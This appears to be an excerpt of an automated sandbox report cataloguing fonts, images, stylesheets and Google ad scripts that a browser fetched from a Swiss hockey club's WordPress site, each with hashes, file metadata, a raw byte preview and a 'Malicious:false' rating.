                                                                                                                                            SHA-512:92D907C953E96DEE24A9E3ADF799D0DF9D3AD0F4B8D8EA320C4E4538698D03217DD653193F7F4275550C147DEA9E991A7ECAFCBA75C95DB7BC1E430CACF63989
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/socicon.woff2?v=4.3.4
                                                                                                                                            Preview:wOF2.......0......r.............................?FFTM....`..T.....l..P..X..6.$..". ..o..8[.'qh..n.`....m$B.8..B..HDM..'f..'$H...t^A.~..T.....f..B3.=b.rs..U.2U.d.z3G.B#.`..Q.._.&....._.....,..<...B.33.....!...7s...+.>.v.a....B$./r....IN^.yZ.?........&.e=!B6.Q..n....E.x....%..`R...T...-5A*J.T...v...y.[....d.=.g;8.D...&lq....\/..4.?.4_O....;)..>.H`X0..&)P.....M.......K.........f..#.2P,.e.e...........%X.W.....p ..E....z...FlcI..Q.6F/..k.........3..B...T.N..<=.N..._.K.".0.q....3..ba..$s<.f..yr.k...!h..xeh}4.}..St..."1O....i.H.e.".....-az...W....-.! .c..].........-...I.!/mG....~.m9q$..d..)...L....UjY`xP..I.@x.X..R....i.?x;..)...#O..H9...C.s....]b...........:.pZ.<y....,....1,.<.<..)..Q...HGR1U.!6...M.r...U.uo.{S.K..qc......d#.q.F.D..>.>.....k...@.....&g.l.....D..HI...ff.G?..._.ZK.1&. 1>.lk.l...d.....'..g.&.%.7...R...^/..U.(*b....!.Q..X...c...G.v.(......^W......n.R..@...I...P....o...=a...T.L.0...q..3..v|F.g.....l........-Fv3h.B.%@.X.F....4...me...|......x........
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):21682
                                                                                                                                            Entropy (8bit):7.986613810059255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:891DD04282802BDA28B1FC77CA3EA19E
                                                                                                                                            SHA1:CF8E6B217EE0A3139A225ECA2421147D09CC8245
                                                                                                                                            SHA-256:9207B4691DA670928B1CB9882681F1E29A8084E421EAFAEDF5BF5BD3E3BCD074
                                                                                                                                            SHA-512:415240A5518C8AB813204763F99EC2E862258D7D6153DDA95230634215371C1C90E4B0B5766AE0C248AEAEDFB70D192D334C1F0E8E7785B81D9D73C9E84F78A5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:800/h:445/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2022/12/IMG_5491.jpg
                                                                                                                                            Preview:RIFF.T..WEBPVP8X..............VP8 .S...4...* ...>.H.L%.02.R.rP..e8.'[>.,.....G..C....k.F..L.d.......]..>n;.i....'.?.w]g....\..7..'?......<7.).'...WU..z.........c|{=....7.O.....?..u.g..`......P.G........ax....ou...J.[).R=.)scg.Si.Q [..........o)...;.u.3Y.|$UGI....b...*...=.%.qu.....Woh.i.F..t.<jV#...D.W l._.A..`..P|..Z..s...!.#9..'.+..Y.l.$n.u....(...o.f..z..5.=ai..&{.-...D.'S.pw.>....1."...2.v..`.;...}.u..<OB...bT.....:.....?......5.^.4.J..K.m...:..H....O.x9.......[...L...v..2...1.r.......C.9c..F...e..t..........36.....t.q...E3},`9..?J.Y...X.>....p.\... ...y.... a...?O4"......6...V......q.n.m.b..(z.v.p.!.."f)I...Q*U.k.wH..K....Q......{.....S.O.I.'...G.4c.+..?..A%:...i}.@LGN5O..Vd.".:h.Gin.h-.U.j.5.;.l.q...M../W..u...".uty.......n.c>...."...6....9..~.\.C........V`..&+...u.+`.;.O|....QL..}~<.Z.P.N..hon.&(.........K.......h.hnU.;......B.....(.....=.6....*..a?.SZ.).#.Gd.+.~Q.".>...s.....v...f..Q...f...;...f...i..Z=.G.i).....gw....RPQ..T.F.,\.z...lE.-.:..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10422
                                                                                                                                            Entropy (8bit):7.948389913980974
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8A079C31F588751B4DC1D66BB1BF8674
                                                                                                                                            SHA1:3B7422288F58B30F4B9180BF029D7528D942881F
                                                                                                                                            SHA-256:18BA3F898025F3D1A9CE8450C79183F21FBA5F490FFC39E8A11332473A467D50
                                                                                                                                            SHA-512:B5F6A367FB1859770123A3E6474CB5C2500E6CCF24A3A625CA0B8C3C4A1A4C7810499566F12EBD446AF10476159FB778DE2ED782F9585E0EE7B287C649115DE0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:auto/h:auto/q:mauto/ig:avif/https://phothockey.ch/wp-content/uploads/2020/09/wiki.png
                                                                                                                                            Preview:RIFF.(..WEBPVP8X..............ALPHS......m.9....O..CD...`;......m..Z..S5.H.Q......]..1.. .e'.X.m./GN>B..(._............N..N.C./.W.YF.:.2.a3....Yf.....R..=.df8...0.J..kvk.e6p.Yf.3..A%....Q.iX.(..Tr...0.0.a%........Z..0.T.._/7..d.g............K..............QQ.0...p.Z...66.3........T......WP;sT.).....*..qe..P.\WP.Q.Z.k...c..2...:.v&"&.3.....>l.P!....8.?..|p..%...;{..iS&O....~.3F...#m.}~..#.....3....l.j.}...7.u..d.$v...........J...5....;...>.Wp.._:.{..YY.d.H...zc....!Gv3u.s.fM..P.....46....Cn..uj..#.p..R._*S..]2...Q.g+W.*...I..N..e........g.r..jM.7.Q..:Q...z...1.....AS.......2.5.e..*...O..*P.#T...O.)..@..O$$5.|.."|=.F.F..B...]...\')G..o$.).....b.4*.\.HaF...Y.,.P...:......H=..2..S.G.&a..R...\...=).GW..L&..o...-L..KL.....Pm....'..o0.. .F..$.!.2I.ej...&....?3a.....'.&J.+E..v39\./..2!,g)... ..|..~..I..E~....Zu..e...Y.'...._.v\5.OR..6......m.\-..$..q.....:E..........*..&....)Ep.]yD~?.9.V.....C^*.\a.....JW.A..;>].s$...R....(...G.J9^.0~....(Y......U.+.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):7974
                                                                                                                                            Entropy (8bit):4.744321628640604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:CAC19DE39B4B14E0B8AAA90D06BFE696
                                                                                                                                            SHA1:851FE6A519A3E86E2E18C179191BD869AF70D949
                                                                                                                                            SHA-256:6D41C3967BE2609D77BCAB64B36FFF22AB9C60D939C4AFDD08D8A55A4F7D225C
                                                                                                                                            SHA-512:4481ADF0479A1C982A4BB9EDF0FA32967F55AD3EADA5D8EF144D779027EE81EFA1FEB36AC1B38B6827B07A2FD7F66390558D4E15166654B733A5A69ADF4103EF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/genericons.css?ver=1732743635
                                                                                                                                            Preview:/**..Genericons.*/..@font-face {. font-family: "Genericons";. src: url("../font/Genericons.woff") format("woff");. font-weight: normal;. font-style: normal;. font-display: block;.}.../**. * All Genericons. */...genericon {..font-size: 16px;..vertical-align: top;..text-align: center;..transition: color .1s ease-in 0;..display: inline-block;..font-family: "Genericons";..font-style: normal;..font-weight: normal;..font-variant: normal;..line-height: 1;..text-decoration: inherit;..text-transform: none;..-moz-osx-font-smoothing: grayscale;..-webkit-font-smoothing: antialiased;..speak: none;.}.../**. * Helper classes. */...genericon-rotate-90 {..transform: rotate(90deg);.}...genericon-rotate-180 {..transform: rotate(180deg);.}...genericon-rotate-270 {..transform: rotate(270deg);.}...genericon-flip-horizontal {..transform: scale(-1, 1);.}...genericon-flip-vertical {..transform: scale(1, -1);.}.../**. * Individual icons. */...genericon-404:before { content: "\f423"; }..genericon-activity:b
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17988
                                                                                                                                            Entropy (8bit):7.983198187133873
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:33CDBA2076E9F1A48492803F773C0B43
                                                                                                                                            SHA1:EF40834FF54D6D46C1F4AE799EB562786848FBCA
                                                                                                                                            SHA-256:4194D0067DAA0CAFD00E1583F409B380E766088749778D73FB1F1FE6F253689E
                                                                                                                                            SHA-512:A225F2DE206C0D309A90279A27BCC6F1FC91D15A498357850552D217E65BF70A7898C82CEE158EF8FCA33323A194A807CAA0E91960F4C51A9B81C5230C5BB7C7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/01/IMG_8907.jpg
                                                                                                                                            Preview:RIFF<F..WEBPVP8X..............VP8 \E.......*....>.@.I...&..<H...M..E....Qq.."...a...m.........d~..G.....?..........+.c.c....W.O.......u...~.zx.>.z...>.7..7.{.O..r..{.f../.}......_.=..9.s...? .......O.......K.........?..........d?.{..F.......^.....A.........^._....m.o..?.~.?..|..........%`f.".v.y..t....I.K.z5...'.YP)R.ld"P....l.PO,....].k.O...7.......[.EW....l-m2Wzk...,0...[.U.|....\..G...`.K....K.8..]..r.>.k.rP.M.1c.e.u.qz..ci....;.....I....<....?.m..k..}b...J8.=.a.?A...p....-..RI^.d......SH3.....f...nU.."=.o....n.H.\2.n.m<,.4.r...f[.....}.WFt...@,%\.K..wC.4k. 9..[....`[.......d_...s'.)e./#}{I.K...Oc....Vr..~R..Uh.Gl#.........{.n9L........B..~.....'..........<x...6-...p.K....5...amo...U...*.......zH..91..+.......3.W'-...4..z!.'P....4.....nT.1...r..K.7..Tr.]...S.;....p...GA.qg@c-..^...a....%.qOj.~3.E..k..~............b. .r.5y.W|..ep.K...-$.....,..r..;1..D.%.C!@..=.~xa....2.%.$.....|.NA.kD.....\....]...v.m.q.~.j.Oq....w.T...*&.....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25470
                                                                                                                                            Entropy (8bit):7.970883224386609
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:60332BDA0F14AB09FB8942E8D7AF638F
                                                                                                                                            SHA1:FA88057B743293C2F09ED80174EC8E0BD35F99BE
                                                                                                                                            SHA-256:2145BF86A7A75D2DC521CA9AA2F43C812EF1F2289E1B33E0A4D34072A5AA62EA
                                                                                                                                            SHA-512:F29F031251A7B5A4E04CA3A6BF7F0F273DEAE719BDD088B5A30D923975533440AB145C151F881DB1E73C63F668E3737F051ED754FD1EBEF5CD88DC9E6418BC3C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............".....................................................................................y>8.9.k.."....GKQ1.*.v@...Tb......F.oT..c..[.<A'SM:...y....F..d.GC......Zu......E_..`....F.Ef..1...VFr.<.7MQ..4...#2..i|.&."RH#...n..5."..?G)".k.*....."&..I..@;&`..mQ^.\;.1v....J0h.<..u..1_.p.C.5z.....D..q....R...[.+.....a..m.....kR?m.S..2.....N..LB....9...`...3`p.....Z..F&.6W%..c(.U..W8.W.....IS..._..r=..%..^..k...TA....uB..[G%zl.=u.w(.\....;.vK...J..=VZ.......*r........]<..fG..).i..<......{.^.&..T".j.2..k..(.yZ...X...9..'.$.z...p..{.....i..{.'..N.(..(J..# _....3.6F....-L.j.$@...2...;........)...<8..f.q\qY7.=..^m&.{.-.........n.\Z
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4837
                                                                                                                                            Entropy (8bit):7.813016820075504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2B79FCA3F3E1FC7AFD28AB89F8756019
                                                                                                                                            SHA1:23E61EDEB639D3E3C5216B7B84ECA50444D8A6C0
                                                                                                                                            SHA-256:1877E66CE65AA9E6F4A1D22E5E505518F297A9B94FFF92E387A6562FBD05C827
                                                                                                                                            SHA-512:951980BC9BACBA4579F11457A907366CE34C008EF1FB6E7615C72809075DB0CB0FBC9AF9F24D8230150179B68090C4FC2ED3296CF34085E39650B969091A1CBB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."..................................................................................D.X@s;...0...d....:....)..20{...b.V...HN..[..0.r.X./`q..2.......3.]P...z...^.:.O....8.:(L..3.H.....\-U{..T..Y.D.[..7^*......B..?2...P..z5.,.NoZ:.v#.&W/.].$......P.`O...Z)...?c...e..91:...E........).8..8..o.....C...R...9...<.iQ.J....k?5.2.....7.q+i..7......3..Y..s....,................................1!".#$%23Q...........G/..I_.e%@,..G.5..wV98.c...U.q...c.....E.E.~...3.",....y|*W...#.G..8...x..yX....$|..W..^J..Q.9.oe ..V.)..j.j..w.....-C.'.>.5...^I.....;.2.BlGh..T..W7..;.....ycQ~|.D...,....1-.ZZ6..{b,.G..M=.vll.. .S0U6..4......G.U..7B,.......<. .!
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4316
                                                                                                                                            Entropy (8bit):7.891479041237815
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1DFFB94982BED839D3FDD21D18F86C03
                                                                                                                                            SHA1:70BBE23D033F56AADBE61BEEB87CCAFA290D176F
                                                                                                                                            SHA-256:A412BF882B7A983651DEC7734DFDAEB9834398110767F5D6871E42975E66184E
                                                                                                                                            SHA-512:4950674061C1747D29F9E8F5A449BAE38DE6D3DBD1D92FC9977764E7DD63C0D37277EAF3C4C1A9732B9D1C7DC5311EA386B71E005B42CE42D7890D6DBBE63703
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/04/IMG_8768.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 .....9...*..Z.>.4.H%..!..L....j...U_\......Q....}...........@...f/.6..O...yQ.w.'...z..y..n.....^..W......._..U......}=....W.....'..{..C.....;>.Y.......YTU...RN...).p.[.;..({...LGe..6.g.W.;""....)E\+.G..........|?.A8u_Ym....R..-(.........."<.K...m<..N..?..NY...>....Pl:..r^=.Z...9.%]Y6...4...e...F.-pP.t^........@(.....Pfq.7L.[.q.b..Y...T.<.......^..?.......NBn.E.D.]....}.1.8.).C........9.P...U{....?...Sp..j....K..........F.Z.T155..#.$....@}... ....X.B...*...yH...S&...P...K..]y..^....v..U........g..p.R..5T.g..v...9.]...*U..7..b.2..l.ZO1 .}...........X.,.k......r.......PIH#..gh.f.[?.*.l.5QO....3.|....K...|........>....1.jZ.%=.I.u.r.:..R.2..T..A.....q.......W..n7....-...Z...B{x..7.|.{..~..0X.wdOY..OF.z..W...=G.....e......U.....z...1....'.E.h.1.3......H..S...~..^..mwi.3.n..#.j..`X............-.@.._.t.#...i..A.)..~.v.o4.~G0........_.(..wJt.1...R..`.).N2E...pJ...3.a.D...:...he....)..>SM...K..e.d.-kX...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1382)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17945
                                                                                                                                            Entropy (8bit):5.330388445341784
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                            SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                            SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                                            SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ep2.adtrafficquality.google/sodar/sodar2.js
                                                                                                                                            Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2793
                                                                                                                                            Entropy (8bit):4.939929543514195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DFCC85677F60462C74204C3540B25C35
                                                                                                                                            SHA1:7129DC31E8744EFF598D92F37D8521B98A0982CA
                                                                                                                                            SHA-256:8BAFB9A7B2809FB9D32742ED6A784D0845BA2A4D2FC298399BF4E277A9CE0CB5
                                                                                                                                            SHA-512:5553316F61F71307BB9F58754CC82BB797E56240F4AC0C683A4C29A0F6BD3E657D860E9F17BB473D2B8EBA1A4C1CA8AACD0C68CDE3550FD70E5A08CB1C966CF6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/embed-block-for-github/repository-block.css?ver=1648037711
                                                                                                                                            Preview:.ebg-br-wrapper .ebg-br-editmode {..display: none;.}...ebg-br-wrapper {..position: relative;..display: flex;..margin: 1em 0 1.5em 0;..padding: 1em;..box-shadow: 10px 10px 15px 0px rgba(0,0,0,0.75);..border-radius: .5em;..border: 1px solid #eee;.}...ebg-br-wrapper-dark-mode-on {..border: 1px solid rgba(94,9,9,1);.}...ebg-br-wrapper > .ebg-br-background-image {..background-image: url('images/github.svg');..background-repeat: no-repeat;..background-position: calc(100% - 0.5em) 0.5em;..background-size: 20px 20px;..position: absolute;. left: 0;. top: 0;. width: 100%;. height: 100%;.}...ebg-br-wrapper-dark-mode-on > .ebg-br-background-image {..-webkit-filter: invert(100%);..-moz-filter: invert(100%);..-o-filter: invert(100%);..-ms-filter: invert(100%);..filter: invert(100%);.}...ebg-br-wrapper .ebg-br-avatar {..display: inline-block;..margin: 0 1em 0 0;..min-width: 150px;.}...ebg-br-wrapper .ebg-br-header-avatar {..max-width: 150px;..border-radius: 50%;.}...ebg-br-wrapper .ebg-br
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (32138)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):106523
                                                                                                                                            Entropy (8bit):5.606242368042826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0D576C0536BB117814A55E12B2103395
                                                                                                                                            SHA1:CA285FA12259B68034B07A2F4F7214AD02032FAC
                                                                                                                                            SHA-256:972AECC8CBF8F332E605E04C2D7A5B90FE368B6B3A6011007B21EC3B7180FE6C
                                                                                                                                            SHA-512:35032E111728046582AE21F81EB7EF760AE9BBF326468E5493D4FF0B0C0C6F9582AA58858B17FD0A34807AD2F4DED03B47DE8F55162D95D01D1E9AEC341A2687
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://securepubads.g.doubleclick.net/tag/js/gpt.js
                                                                                                                                            Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (61198)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):68827
                                                                                                                                            Entropy (8bit):5.397687249581211
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4CF92AE37170F929B3A99203FBB4A3A0
                                                                                                                                            SHA1:04487D75D6CC8DD2A5279E289AD40EC1FBCBF653
                                                                                                                                            SHA-256:E82FB8213DEBCE9D36AE32CED34382649AC21E813B984AA7CB3DB47752CC5183
                                                                                                                                            SHA-512:40FCFC773B4F03A884093F8455A2588A87CAB3195295CF74408075F249A752E340E645D72D371E767C17BD59F8DDADC1ED5831F70AA534BE933BD0E156ABE7B1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/sports-leagues/public/js/sl-public.min.js?ver=0.13.6
                                                                                                                                            Preview:(function(Xt){typeof define=="function"&&define.amd?define(Xt):Xt()})(function(){"use strict";var Xt=document.createElement("style");Xt.textContent=`.tippy-box[data-animation=fade][data-state=hidden]{opacity:0}[data-tippy-root]{max-width:calc(100vw - 10px)}.tippy-box{position:relative;background-color:#333;color:#fff;border-radius:4px;font-size:14px;line-height:1.4;white-space:normal;outline:0;transition-property:transform,visibility,opacity}.tippy-box[data-placement^=top]>.tippy-arrow{bottom:0}.tippy-box[data-placement^=top]>.tippy-arrow:before{bottom:-7px;left:0;border-width:8px 8px 0;border-top-color:initial;transform-origin:center top}.tippy-box[data-placement^=bottom]>.tippy-arrow{top:0}.tippy-box[data-placement^=bottom]>.tippy-arrow:before{top:-7px;left:0;border-width:0 8px 8px;border-bottom-color:initial;transform-origin:center bottom}.tippy-box[data-placement^=left]>.tippy-arrow{right:0}.tippy-box[data-placement^=left]>.tippy-arrow:before{border-width:8px 0 8px 8px;border-left-
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3679)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):161797
                                                                                                                                            Entropy (8bit):5.5991946485901405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:29CFDF5052C7D9087FBDB069E39BE4AB
                                                                                                                                            SHA1:31021F3F72ECAB7404A266939CF8C45C287DCD94
                                                                                                                                            SHA-256:B59FA6BD5CC8C1B8F29BF33E3A0F6E6400F579BD8A7F5DBAF7AABEB2AE73BC14
                                                                                                                                            SHA-512:EF2C1548714F202BD674862A3EAD513FFB595DD3FC7836ACA354AF27BC02481C70B340C8F8229F2BB9320FE13B0E7B6819240ABF5D3320E3C97DDCB52D76539C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5534394335622311
                                                                                                                                            Preview:(function(sttc){'use strict';var aa,ba=Object.defineProperty;function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+"$"+d),ba(f,ha[d],{configurable:!0,writable:!0,value:b})))}}ja("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")},"es_nex
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):27014
                                                                                                                                            Entropy (8bit):5.4317524695324035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5AA8A4332B0A3AA8528B6D1A4AC297C5
                                                                                                                                            SHA1:8F607F3ADA1DFC3A61201FC32BB4F34ABC1DA2A3
                                                                                                                                            SHA-256:9640A181D883267880A1DDF61E50E83A2A2A064B061952B4B541928242AE9B82
                                                                                                                                            SHA-512:64A16B71E989250FB4B2A7096D2254FE92861C21DEE834FC46735165FE2DE5DBB139942757BBF004E5E03BC2AF9874D3DDA21916FFEA99B64CF6A9A536C585AD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1
                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz0dL_nz.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzQdL_nz.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzwdL_nz.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzMdL_nz.woff2) format('woff2');. unicod
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13752
                                                                                                                                            Entropy (8bit):7.974349414432706
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8DFBAD2E1644057AD8B3E635C8979392
                                                                                                                                            SHA1:5C29C095328202F3D40A462A2A6A85F088B6D974
                                                                                                                                            SHA-256:0B55B6BF29D2A36CCD701A0DC448F4BA65070F4547F74C86CC55448F71CE3989
